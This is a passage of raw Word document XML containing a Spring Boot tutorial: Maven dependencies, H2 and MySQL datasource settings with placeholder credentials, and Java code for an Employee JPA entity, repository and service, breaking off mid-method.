        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JDBC Driver</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for your database (e.g., H2, MySQL, PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B24019"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lt;dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0851BE07"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 Spring Boot Starter Web --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F3B5D6"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A939B6D"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBE5F6B"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artifactId&gt;spring-boot-starter-web&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415F55E7"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F4415"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24937FD8"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 Spring Boot Starter Data JPA --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499C4D5F"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C511AEE"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E82DD5A"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artifactId&gt;spring-boot-starter-data-jpa&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7284B6"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5A0ABD" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125ADF96"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 H2 Database (or replace with MySQL, PostgreSQL, etc.) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434038B0"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CB7E73"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groupId&gt;com.h2database&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BEB255"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artifactId&gt;h2&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCC3555"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scope&gt;runtime&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6126B82C"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257455F7" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B12A05F"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 Spring Boot Starter for Testing --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149F4CD5"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5345A5"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groupId&gt;org.springframework.boot&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA3A29C"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artifactId&gt;spring-boot-starter-test&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA20213"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scope&gt;test&lt;/scope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35369714"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dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4E9DA1"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lt;/dependencies&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0501E848"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">For other databases (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), you would replace the H2 dependency with the relevant JDBC driver, like so:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538CDE0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2033"/>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For </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3EDB4C" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096FD30C" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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groupId&gt;mysql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22001E12" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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artifactId&gt;mysql-connector-java&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798E608B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AA3B0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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For </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706860F" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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lt;dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4051AF3D" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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groupId&gt;org.postgresql&lt;/groupId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC7D12" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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lt;artifactId&gt;postgresql&lt;/artifactId&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1216E113" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:ind w:left="720"/>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lt;/dependency&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C55EF6" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2. Configure application.properties:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8BAAA"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Set the database connection properties in the src/main/resources/application.properties (or application.yml).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7DE78B"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Here’s an example for </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>H2</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> database:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1228ACE5"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H2 Database Configuration (for in-memory DB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7D8829"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spring.datasource.url=jdbc:h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DD64DD"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spring.datasource.driverClassName=org.h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F732F34"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spring.datasource.username=sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E6AB37"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spring.datasource.password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C434834"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spring.jpa.database-platform=org.hibernate.dialect.H2Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C35CA09"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spring.jpa.hibernate.ddl-auto=update  # Can be create, create-drop, update, or none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56947843"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spring.jpa.show-sql=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D676A3"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you would use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76920BF3"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MySQL Database Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE16715"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spring.datasource.url=jdbc:mysql://localhost:3306/your_database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C6991"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spring.datasource.driverClassName=com.mysql.cj.jdbc.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AAD0D2"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spring.datasource.username=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7519C68D"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spring.datasource.password=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E30D40"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spring.jpa.database-platform=org.hibernate.dialect.MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39803E2C"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spring.jpa.hibernate.ddl-auto=update  # Can be create, create-drop, update, or none</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDE372"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spring.jpa.show-sql=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666B4E80" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3. Create the JPA Entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAF6648"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Create a model class annotated with @Entity. This class will be mapped to a table in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF3B392"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package com.example.demo.model;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CB297" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F9C40CB"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import javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E81FD"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import javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727DA35E"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import javax.persistence.GeneratedValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F152E5"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import javax.persistence.GenerationType;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D05FDDF" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29E93652"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Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D5A740"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public class Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E3CB0" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AEAD7EC"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6A441D"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GeneratedValue(strategy = GenerationType.IDENTITY)  // Auto-generated value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC3DC09"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rivate Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDD1465" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45643956"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rivate String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F87F7F"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rivate String department;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483FEA27" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5706AACA"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 Getters and Setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2F24E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A67BE4" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>4. Create the JPA Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EBC6B3"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Spring Data JPA allows you to use repositories for CRUD operations. You don’t need to write any implementation code. Simply create an interface extending JpaRepository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61329804"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lastRenderedPageBreak/>
        <w:t>package com.example.demo.repository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFECD3B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06145356"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import com.example.demo.model.Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CDCA4E"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import org.springframework.data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D6F7C9" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ECD7F9"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public interface EmployeeRepository extends JpaRepository&lt;Employee, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63265255"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 Custom query methods can be added here if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50316FC7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139A0A86" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Create a Service Layer (Optional but recommended):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1792795E"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Create a service class to handle the business logic and interact with the repository.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946D7F3"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package com.example.demo.service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD76615" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B74278B"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import com.example.demo.model.Employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221DD943"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import com.example.demo.repository.EmployeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E24AA0A"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import org.springframework.beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C4583"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import org.springframework.stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79235A13" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C43808A"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import java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A70EDE"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import java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F2213B" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EF1B251"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Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7952BE1D"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public class EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765465ED" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED73DFE"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42720DB8"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rivate EmployeeRepository employeeRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C851A85" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09572F85"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ublic List&lt;Employee&gt; getAllEmployees() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C6B491"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return employeeRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120A01CF"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F421AA" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44BC4AD4"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ublic Optional&lt;Employee&gt; getEmployeeById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068F7937"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return employeeRepository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4929F06C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F936F9" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BBEE332"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ublic Employee saveEmployee(Employee employee) {</w:t>
      </w:r>
    </w:p>
